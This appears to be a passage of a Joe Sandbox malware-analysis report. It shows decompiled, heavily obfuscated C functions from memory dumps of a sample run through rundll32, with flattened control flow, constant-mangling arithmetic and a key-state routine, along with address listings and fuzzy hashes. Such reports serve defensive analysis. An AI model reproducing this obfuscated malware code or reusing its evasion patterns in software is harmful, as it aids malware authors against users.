				_v60 = _v60 | 0x99e12062;
				_v60 = _v60 ^ 0x9bf73816;
				_v92 = 0x911a2f;
				_v92 = _v92 ^ 0xd10c2d91;
				_v92 = _v92 * 0x5e;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0xdd366504;
				_v64 = 0x3fcb13;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 * 6;
				_v64 = _v64 ^ 0x00005971;
				_v44 = 0xc7907a;
				_v44 = _v44 << 0xb;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x000cecb3;
				_v24 = 0x5cb13a;
				_v24 = _v24 | 0x9101a275;
				_v24 = _v24 ^ 0x91595ccd;
				_v48 = 0x23abf4;
				_v48 = _v48 / _t204;
				_v48 = _v48 << 2;
				_v48 = _v48 ^ 0x0009bb3e;
				_v68 = 0x8d9eb5;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 + 0xf044;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x000dd2f9;
				_v20 = 0x3507ed;
				_v20 = _v20 + 0xe3ac;
				_v20 = _v20 ^ 0x00302855;
				_v32 = 0xacaccb;
				_v32 = _v32 ^ 0xc0e60235;
				_t205 = 0x4e;
				_v32 = _v32 * 0x53;
				_v32 = _v32 ^ 0x583b0f23;
				_v36 = 0x7d6507;
				_v36 = _v36 + 0xffff02b5;
				_t191 = _v36;
				_t218 = _t191 % _t205;
				_v36 = _t191 / _t205;
				_v36 = _v36 ^ 0x0005008b;
				_v40 = 0xd19b6c;
				_v40 = _v40 | 0xa0bb2537;
				_v40 = _v40 + 0xffff1d7c;
				_v40 = _v40 ^ 0xa0fa32c2;
				_v72 = 0xc60854;
				_v72 = _v72 | 0x85b2e473;
				_v72 = _v72 + 0x7f84;
				_v72 = _v72 * 0x36;
				_v72 = _v72 ^ 0x423e0813;
				_v76 = 0xd43520;
				_v76 = _v76 + 0x4339;
				_v76 = _v76 + 0xffffe1a4;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000c8c56;
				do {
					while(_t208 != 0x2557e54) {
						if(_t208 == 0x31efc18) {
							_t208 = 0xe841cef;
							continue;
						} else {
							if(_t208 == 0xa700901) {
								E0034B267(_a4, _t218, _v68,  &_v16, _v20, _t208, _v32, _t220, _v36, _v40, _t208, _v72, _v76, _v80);
								 *_t219 = _v16;
							} else {
								if(_t208 != 0xe841cef) {
									goto L11;
								} else {
									_t203 = E0034B267(_a4, _t218, _v84,  &_v16, _v52, _t208, _v56, 0, _v88, _v60, _t208, _v92, _v64, _v28);
									_t223 =  &(_t223[0xc]);
									if(_t203 != 0) {
										_t208 = 0x2557e54;
										continue;
									}
								}
							}
						}
						L14:
						return _t220;
					}
					_push(_t208);
					_push(_t208);
					_t220 = E00353512(_v16);
					if(_t220 == 0) {
						_t208 = 0x2fabbe9;
						goto L11;
					} else {
						_t208 = 0xa700901;
						continue;
					}
					goto L14;
					L11:
				} while (_t208 != 0x2fabbe9);
				goto L14;
			}




































                                                                                                                      0x00355626
                                                                                                                      0x0035562a
                                                                                                                      0x0035562b
                                                                                                                      0x0035562f
                                                                                                                      0x00355630
                                                                                                                      0x00355631
                                                                                                                      0x00355636
                                                                                                                      0x0035563b
                                                                                                                      0x0035563e
                                                                                                                      0x00355648
                                                                                                                      0x00355650
                                                                                                                      0x00355652
                                                                                                                      0x0035565a
                                                                                                                      0x0035565f
                                                                                                                      0x00355664
                                                                                                                      0x0035566c
                                                                                                                      0x00355674
                                                                                                                      0x00355680
                                                                                                                      0x00355681
                                                                                                                      0x00355685
                                                                                                                      0x0035568d
                                                                                                                      0x00355695
                                                                                                                      0x0035569d
                                                                                                                      0x003556aa
                                                                                                                      0x003556ae
                                                                                                                      0x003556b6
                                                                                                                      0x003556be
                                                                                                                      0x003556c6
                                                                                                                      0x003556cb
                                                                                                                      0x003556d3
                                                                                                                      0x003556db
                                                                                                                      0x003556e3
                                                                                                                      0x003556eb
                                                                                                                      0x003556f0
                                                                                                                      0x003556f8
                                                                                                                      0x00355705
                                                                                                                      0x00355709
                                                                                                                      0x00355711
                                                                                                                      0x00355719
                                                                                                                      0x00355721
                                                                                                                      0x00355729
                                                                                                                      0x0035572e
                                                                                                                      0x00355736
                                                                                                                      0x0035573e
                                                                                                                      0x00355746
                                                                                                                      0x00355753
                                                                                                                      0x00355757
                                                                                                                      0x0035575c
                                                                                                                      0x00355764
                                                                                                                      0x0035576c
                                                                                                                      0x00355776
                                                                                                                      0x0035577a
                                                                                                                      0x00355782
                                                                                                                      0x0035578a
                                                                                                                      0x0035578f
                                                                                                                      0x00355794
                                                                                                                      0x0035579c
                                                                                                                      0x003557a4
                                                                                                                      0x003557ac
                                                                                                                      0x003557b4
                                                                                                                      0x003557c2
                                                                                                                      0x003557c6
                                                                                                                      0x003557cb
                                                                                                                      0x003557d3
                                                                                                                      0x003557db
                                                                                                                      0x003557e0
                                                                                                                      0x003557e8
                                                                                                                      0x003557ed
                                                                                                                      0x003557f5
                                                                                                                      0x003557ff
                                                                                                                      0x0035580c
                                                                                                                      0x00355814
                                                                                                                      0x0035581c
                                                                                                                      0x0035582b
                                                                                                                      0x0035582c
                                                                                                                      0x00355830
                                                                                                                      0x00355838
                                                                                                                      0x00355840
                                                                                                                      0x00355848
                                                                                                                      0x0035584c
                                                                                                                      0x00355853
                                                                                                                      0x00355857
                                                                                                                      0x0035585f
                                                                                                                      0x00355867
                                                                                                                      0x0035586f
                                                                                                                      0x00355877
                                                                                                                      0x0035587f
                                                                                                                      0x00355887
                                                                                                                      0x0035588f
                                                                                                                      0x0035589c
                                                                                                                      0x003558a0
                                                                                                                      0x003558a8
                                                                                                                      0x003558b0
                                                                                                                      0x003558b8
                                                                                                                      0x003558c0
                                                                                                                      0x003558c5
                                                                                                                      0x003558cd
                                                                                                                      0x003558cd
                                                                                                                      0x003558d7
                                                                                                                      0x0035592d
                                                                                                                      0x00000000
                                                                                                                      0x003558d9
                                                                                                                      0x003558db
                                                                                                                      0x0035599c
                                                                                                                      0x003559ab
                                                                                                                      0x003558e1
                                                                                                                      0x003558e7
                                                                                                                      0x00000000
                                                                                                                      0x003558e9
                                                                                                                      0x00355919
                                                                                                                      0x0035591e
                                                                                                                      0x00355923
                                                                                                                      0x00355929
                                                                                                                      0x00000000
                                                                                                                      0x00355929
                                                                                                                      0x00355923
                                                                                                                      0x003558e7
                                                                                                                      0x003558db
                                                                                                                      0x003559ae
                                                                                                                      0x003559b6
                                                                                                                      0x003559b6
                                                                                                                      0x00355940
                                                                                                                      0x00355941
                                                                                                                      0x0035594b
                                                                                                                      0x00355951
                                                                                                                      0x0035595a
                                                                                                                      0x00000000
                                                                                                                      0x00355953
                                                                                                                      0x00355953
                                                                                                                      0x00000000
                                                                                                                      0x00355953
                                                                                                                      0x00000000
                                                                                                                      0x0035595f
                                                                                                                      0x0035595f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1n$9C$U(0$qY$Lg
                                                                                                                      • API String ID: 0-890920262
                                                                                                                      • Opcode ID: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction ID: 76e2f2479d0f0dce9e20cce2a6fcc48d82c7526eea435f9e1aa19fd30811212c
                                                                                                                      • Opcode Fuzzy Hash: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction Fuzzy Hash: 8E910DB14093819FC359CF65C58A81BFBF1BB94758F004A0DF6A596260D3B69A48CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035D3C8 Relevance: 6.4, Strings: 5, Instructions: 167COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0035D3C8(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v616;
				void* _t202;
				void* _t203;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr _t226;

				_v88 = _v88 & 0x00000000;
				_v96 = 0x9df3e3;
				_v92 = 0x111c87;
				_v84 = 0xa084f0;
				_v84 = _v84 | 0x40312458;
				_v84 = _v84 ^ 0x40bb7f3e;
				_v16 = 0xcefd9d;
				_v16 = _v16 + 0xcd96;
				_t210 = 0x6a;
				_v16 = _v16 * 0xf;
				_v16 = _v16 * 0x19;
				_v16 = _v16 ^ 0x30695f7a;
				_v40 = 0x424711;
				_v40 = _v40 + 0x2590;
				_v40 = _v40 ^ 0x3a2a5382;
				_v40 = _v40 | 0x2443fe5b;
				_v40 = _v40 ^ 0x3e6f608b;
				_v72 = 0x627874;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 ^ 0x0000543e;
				_v32 = 0xe24590;
				_v32 = _v32 | 0xeb3a48f8;
				_v32 = _v32 << 7;
				_v32 = _v32 * 0x3c;
				_v32 = _v32 ^ 0x5522ca4e;
				_v48 = 0xd6f907;
				_v48 = _v48 << 1;
				_v48 = _v48 / _t210;
				_v48 = _v48 ^ 0x000b1c59;
				_v8 = 0xcfad9d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 << 6;
				_v8 = _v8 + 0xffff7e6c;
				_v8 = _v8 ^ 0xad990d89;
				_v80 = 0x5a76f4;
				_v80 = _v80 << 1;
				_v80 = _v80 ^ 0x00be33e4;
				_v24 = 0x133aa1;
				_v24 = _v24 ^ 0xc65a4b7f;
				_v24 = _v24 * 0x1e;
				_v24 = _v24 * 0x13;
				_v24 = _v24 ^ 0x7f83be07;
				_v64 = 0x82e5fc;
				_v64 = _v64 + 0xffffc657;
				_v64 = _v64 ^ 0x008deef7;
				_v52 = 0x864f04;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0xeb96;
				_v52 = _v52 ^ 0xc9ef9c56;
				_v20 = 0x197ff2;
				_v20 = _v20 + 0xffff42c2;
				_v20 = _v20 + 0x3e6b;
				_v20 = _v20 ^ 0xe022d7dd;
				_v20 = _v20 ^ 0xe031a9ca;
				_v68 = 0x51f027;
				_v68 = _v68 ^ 0xb9085631;
				_v68 = _v68 ^ 0xb9589630;
				_v56 = 0x8df2a2;
				_v56 = _v56 ^ 0x4cb2f0be;
				_v56 = _v56 ^ 0x0e08f962;
				_v56 = _v56 ^ 0x42319e50;
				_v12 = 0x46739a;
				_v12 = _v12 + 0x8337;
				_v12 = _v12 + 0xd158;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xf903dec7;
				_v36 = 0x3dfdbe;
				_v36 = _v36 * 0x2f;
				_t211 = 0x2a;
				_v36 = _v36 / _t211;
				_t212 = 0x45;
				_v36 = _v36 / _t212;
				_v36 = _v36 ^ 0x000da6e6;
				_v28 = 0x24761f;
				_v28 = _v28 << 9;
				_v28 = _v28 + 0xffffc268;
				_v28 = _v28 >> 8;
				_v28 = _v28 ^ 0x0040fbfa;
				_v60 = 0xc6a3a8;
				_v60 = _v60 + 0xffff6723;
				_v60 = _v60 * 0x24;
				_v60 = _v60 ^ 0x1bd7278b;
				_v44 = 0xb19a36;
				_v44 = _v44 + 0xb2d2;
				_v44 = _v44 | 0xf7fdfee7;
				_v44 = _v44 ^ 0xf7fbe5a1;
				_v76 = 0x3b8058;
				_v76 = _v76 | 0x902cc23a;
				_v76 = _v76 ^ 0x903f9f8c;
				_t226 =  *0x36520c; // 0x0
				_t202 = E00354FA8(_v84, _t226 + 0x220, _v16, _v40);
				_t234 = _a4 + 0x2c;
				_t203 = E0035FC96(_v72, _v32, _a4 + 0x2c, _v48, _t202);
				_t243 = _t203;
				if(_t203 != 0) {
					_push(_v64);
					_push(_v24);
					_push(0x3410cc);
					E0034E7CE(E0034AB66(_v8, _v80, _t243), _t243, _v52,  *((intOrPtr*)(_a8 + 0x14)), _v8, _v20, _v68, _v56, _v12, _t234);
					E0034AE03(_v36, _v28, _v60, _t206);
					E0034BAB0( &_v616, _v44, _v76);
				}
				return 1;
			}

































                                                                                                                      0x0035d3d1
                                                                                                                      0x0035d3d7
                                                                                                                      0x0035d3de
                                                                                                                      0x0035d3e5
                                                                                                                      0x0035d3ec
                                                                                                                      0x0035d3f3
                                                                                                                      0x0035d3fa
                                                                                                                      0x0035d401
                                                                                                                      0x0035d40f
                                                                                                                      0x0035d410
                                                                                                                      0x0035d417
                                                                                                                      0x0035d41a
                                                                                                                      0x0035d421
                                                                                                                      0x0035d428
                                                                                                                      0x0035d42f
                                                                                                                      0x0035d436
                                                                                                                      0x0035d43d
                                                                                                                      0x0035d444
                                                                                                                      0x0035d44b
                                                                                                                      0x0035d44f
                                                                                                                      0x0035d456
                                                                                                                      0x0035d45d
                                                                                                                      0x0035d464
                                                                                                                      0x0035d46c
                                                                                                                      0x0035d46f
                                                                                                                      0x0035d476
                                                                                                                      0x0035d47d
                                                                                                                      0x0035d485
                                                                                                                      0x0035d488
                                                                                                                      0x0035d48f
                                                                                                                      0x0035d496
                                                                                                                      0x0035d49a
                                                                                                                      0x0035d49e
                                                                                                                      0x0035d4a5
                                                                                                                      0x0035d4ac
                                                                                                                      0x0035d4b3
                                                                                                                      0x0035d4b6
                                                                                                                      0x0035d4bd
                                                                                                                      0x0035d4c4
                                                                                                                      0x0035d4cf
                                                                                                                      0x0035d4d6
                                                                                                                      0x0035d4d9
                                                                                                                      0x0035d4e0
                                                                                                                      0x0035d4e7
                                                                                                                      0x0035d4ee
                                                                                                                      0x0035d4f5
                                                                                                                      0x0035d4fc
                                                                                                                      0x0035d500
                                                                                                                      0x0035d507
                                                                                                                      0x0035d50e
                                                                                                                      0x0035d515
                                                                                                                      0x0035d51c
                                                                                                                      0x0035d523
                                                                                                                      0x0035d52a
                                                                                                                      0x0035d531
                                                                                                                      0x0035d538
                                                                                                                      0x0035d53f
                                                                                                                      0x0035d546
                                                                                                                      0x0035d54d
                                                                                                                      0x0035d554
                                                                                                                      0x0035d55b
                                                                                                                      0x0035d562
                                                                                                                      0x0035d569
                                                                                                                      0x0035d570
                                                                                                                      0x0035d577
                                                                                                                      0x0035d57b
                                                                                                                      0x0035d582
                                                                                                                      0x0035d58f
                                                                                                                      0x0035d597
                                                                                                                      0x0035d59c
                                                                                                                      0x0035d5a4
                                                                                                                      0x0035d5a7
                                                                                                                      0x0035d5aa
                                                                                                                      0x0035d5b1
                                                                                                                      0x0035d5b8
                                                                                                                      0x0035d5bc
                                                                                                                      0x0035d5c3
                                                                                                                      0x0035d5c7
                                                                                                                      0x0035d5ce
                                                                                                                      0x0035d5d5
                                                                                                                      0x0035d5e0
                                                                                                                      0x0035d5e3
                                                                                                                      0x0035d5ea
                                                                                                                      0x0035d5f1
                                                                                                                      0x0035d5f8
                                                                                                                      0x0035d5ff
                                                                                                                      0x0035d606
                                                                                                                      0x0035d60d
                                                                                                                      0x0035d614
                                                                                                                      0x0035d621
                                                                                                                      0x0035d630
                                                                                                                      0x0035d63f
                                                                                                                      0x0035d646
                                                                                                                      0x0035d64e
                                                                                                                      0x0035d650
                                                                                                                      0x0035d653
                                                                                                                      0x0035d656
                                                                                                                      0x0035d65f
                                                                                                                      0x0035d68d
                                                                                                                      0x0035d69c
                                                                                                                      0x0035d6ad
                                                                                                                      0x0035d6b5
                                                                                                                      0x0035d6bd

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID: >T$X$1@$k>$txb$z_i0
                                                                                                                      • API String ID: 1586166983-1035483976
                                                                                                                      • Opcode ID: 943f9ffb16b30b4896a016cd57611cf02a53bf0a7b48db1fb95d9ddd42e4c588
                                                                                                                      • Instruction ID: e69f6b6f57a00d50a0fe41828afeae783cd0e17089b987444c1e73aad9fc2f68
                                                                                                                      • Opcode Fuzzy Hash: 943f9ffb16b30b4896a016cd57611cf02a53bf0a7b48db1fb95d9ddd42e4c588
                                                                                                                      • Instruction Fuzzy Hash: 8291F0B2C00219ABCF19CFE5D98A8DEFBB1FB48304F208159E416BA260D7B55A45CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035542E Relevance: 6.4, Strings: 5, Instructions: 107COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0035542E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t103;
				void* _t104;
				void* _t107;
				signed int _t109;
				signed int _t110;
				void* _t119;
				void* _t120;
				signed int* _t122;

				_t122 =  &_v40;
				_v16 = 0x36dfa5;
				_v16 = _v16 + 0x3b08;
				_t107 = __ecx;
				_t119 = 0;
				_t109 = 0x6b;
				_v16 = _v16 / _t109;
				_v16 = _v16 ^ 0x0008b2f0;
				_t120 = 0x25318c3;
				_v32 = 0xe406cb;
				_v32 = _v32 + 0xf1ff;
				_v32 = _v32 << 0xd;
				_t110 = 0x38;
				_v32 = _v32 / _t110;
				_v32 = _v32 ^ 0x02d3dd20;
				_v36 = 0x75fef9;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 + 0x1d86;
				_v36 = _v36 | 0xca94675a;
				_v36 = _v36 ^ 0xca99002d;
				_v20 = 0xf78cd;
				_v20 = _v20 * 0x50;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x004e8f0d;
				_v24 = 0x451f1c;
				_v24 = _v24 + 0xffffecca;
				_v24 = _v24 + 0xffffe02c;
				_v24 = _v24 ^ 0x0044bfd9;
				_v40 = 0xfdbfec;
				_v40 = _v40 << 8;
				_v40 = _v40 + 0x2a17;
				_v40 = _v40 ^ 0x2ee485ab;
				_v40 = _v40 ^ 0xd32b8602;
				_v28 = 0xc36f29;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 + 0xffff93a5;
				_v28 = _v28 ^ 0xfffd5496;
				_v4 = 0xb22cca;
				_v4 = _v4 * 0x61;
				_v4 = _v4 ^ 0x438b1823;
				_v8 = 0x4d4bc7;
				_v8 = _v8 + 0xffff7d22;
				_v8 = _v8 ^ 0x00436970;
				_v12 = 0xfbac3c;
				_v12 = _v12 | 0x3e605f41;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0xefb5eaa0;
				do {
					while(_t120 != 0x25318c3) {
						if(_t120 == 0x409e50d) {
							_t103 = E0035274F();
							_t122 = _t122 - 0xc + 0xc;
							_t120 = 0x7f367f8;
							_t119 = _t119 + _t103;
							continue;
						} else {
							if(_t120 == 0x7f367f8) {
								_t104 = E0034B782(_t107 + 0xc, _v24, _v40, _v28);
								_t122 =  &(_t122[2]);
								_t120 = 0xdeee07a;
								_t119 = _t119 + _t104;
								continue;
							} else {
								if(_t120 != 0xdeee07a) {
									goto L10;
								} else {
									_t119 = _t119 + E0034B782(_t107 + 4, _v4, _v8, _v12);
								}
							}
						}
						L6:
						return _t119;
					}
					_t120 = 0x409e50d;
					L10:
				} while (_t120 != 0xb6d7b22);
				goto L6;
			}





















                                                                                                                      0x0035542e
                                                                                                                      0x00355431
                                                                                                                      0x0035543b
                                                                                                                      0x0035544d
                                                                                                                      0x0035544f
                                                                                                                      0x00355451
                                                                                                                      0x00355456
                                                                                                                      0x0035545c
                                                                                                                      0x00355464
                                                                                                                      0x00355469
                                                                                                                      0x00355476
                                                                                                                      0x0035547e
                                                                                                                      0x00355487
                                                                                                                      0x0035548a
                                                                                                                      0x0035548e
                                                                                                                      0x00355496
                                                                                                                      0x0035549e
                                                                                                                      0x003554a3
                                                                                                                      0x003554ab
                                                                                                                      0x003554b3
                                                                                                                      0x003554bb
                                                                                                                      0x003554c8
                                                                                                                      0x003554cc
                                                                                                                      0x003554d1
                                                                                                                      0x003554d9
                                                                                                                      0x003554e1
                                                                                                                      0x003554e9
                                                                                                                      0x003554f1
                                                                                                                      0x003554f9
                                                                                                                      0x00355501
                                                                                                                      0x00355506
                                                                                                                      0x0035550e
                                                                                                                      0x00355516
                                                                                                                      0x0035551e
                                                                                                                      0x00355526
                                                                                                                      0x0035552b
                                                                                                                      0x00355533
                                                                                                                      0x0035553b
                                                                                                                      0x00355548
                                                                                                                      0x0035554c
                                                                                                                      0x00355554
                                                                                                                      0x0035555c
                                                                                                                      0x00355564
                                                                                                                      0x0035556c
                                                                                                                      0x00355574
                                                                                                                      0x0035557c
                                                                                                                      0x00355581
                                                                                                                      0x00355589
                                                                                                                      0x00355589
                                                                                                                      0x00355593
                                                                                                                      0x003555fb
                                                                                                                      0x00355600
                                                                                                                      0x00355603
                                                                                                                      0x00355608
                                                                                                                      0x00000000
                                                                                                                      0x00355595
                                                                                                                      0x0035559b
                                                                                                                      0x003555d7
                                                                                                                      0x003555dc
                                                                                                                      0x003555df
                                                                                                                      0x003555e4
                                                                                                                      0x00000000
                                                                                                                      0x0035559d
                                                                                                                      0x003555a3
                                                                                                                      0x00000000
                                                                                                                      0x003555a5
                                                                                                                      0x003555bc
                                                                                                                      0x003555bc
                                                                                                                      0x003555a3
                                                                                                                      0x0035559b
                                                                                                                      0x003555be
                                                                                                                      0x003555c7
                                                                                                                      0x003555c7
                                                                                                                      0x0035560f
                                                                                                                      0x00355611
                                                                                                                      0x00355611
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$A_`>$piC$z$z
                                                                                                                      • API String ID: 0-2268621895
                                                                                                                      • Opcode ID: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction ID: a0796d8b05d76bde5a2a5581cf531b514ce3377ec7c864b7610b0b8e614641b1
                                                                                                                      • Opcode Fuzzy Hash: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction Fuzzy Hash: FD414AB29093029FC345CF25D58940BFBE1BBD4719F419A2DF89A96220D774DA0E8F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                      • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                      • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                      • SendMessageA.USER32 ref: 1001B48B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State$LongMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1063413437-0
                                                                                                                      • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                      • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00341F9B Relevance: 5.4, Strings: 4, Instructions: 413COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00341F9B(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr _t419;
				void* _t424;
				void* _t432;
				signed int _t435;
				void* _t444;
				intOrPtr* _t446;
				void* _t448;
				signed char* _t458;
				signed char* _t493;
				intOrPtr* _t498;
				intOrPtr _t499;
				intOrPtr _t500;
				void* _t501;
				signed char* _t502;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				intOrPtr _t513;
				void* _t514;
				void* _t515;
				void* _t519;

				_t498 = _a20;
				_t446 = __edx;
				_push(_t498);
				_push(_a16);
				_push(_a12);
				_v88 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(__ecx);
				_v236 = 0xf0db43;
				_t515 = _t514 + 0x1c;
				_v236 = _v236 + 0xffff6527;
				_v236 = _v236 ^ 0x37601acd;
				_t499 = 0;
				_v236 = _v236 >> 1;
				_t448 = 0xb503f3;
				_v236 = _v236 ^ 0x1bc82d53;
				_v140 = 0x2172ad;
				_v140 = _v140 + 0x5f16;
				_v140 = _v140 ^ 0x0021d183;
				_v124 = 0x27fcb3;
				_t504 = 0x21;
				_v124 = _v124 / _t504;
				_v124 = _v124 ^ 0x00013673;
				_v108 = 0x51f448;
				_t505 = 0x49;
				_v92 = 0;
				_v108 = _v108 * 0x2f;
				_v108 = _v108 ^ 0x0f088890;
				_v212 = 0xcc9eac;
				_v212 = _v212 + 0xffffe9a6;
				_v212 = _v212 / _t505;
				_v212 = _v212 + 0xffffa822;
				_v212 = _v212 ^ 0x000711be;
				_v220 = 0xbaa1b0;
				_t506 = 0x3a;
				_v220 = _v220 * 0x1b;
				_v220 = _v220 * 0x49;
				_v220 = _v220 << 0xd;
				_v220 = _v220 ^ 0x5bc66ad4;
				_v96 = 0x96051c;
				_v96 = _v96 * 0x64;
				_v96 = _v96 ^ 0x3a9f1857;
				_v144 = 0x7390a9;
				_v144 = _v144 + 0xe6fa;
				_v144 = _v144 ^ 0x007f1cdd;
				_v196 = 0xf57225;
				_v196 = _v196 >> 0xe;
				_v196 = _v196 + 0xffff98f0;
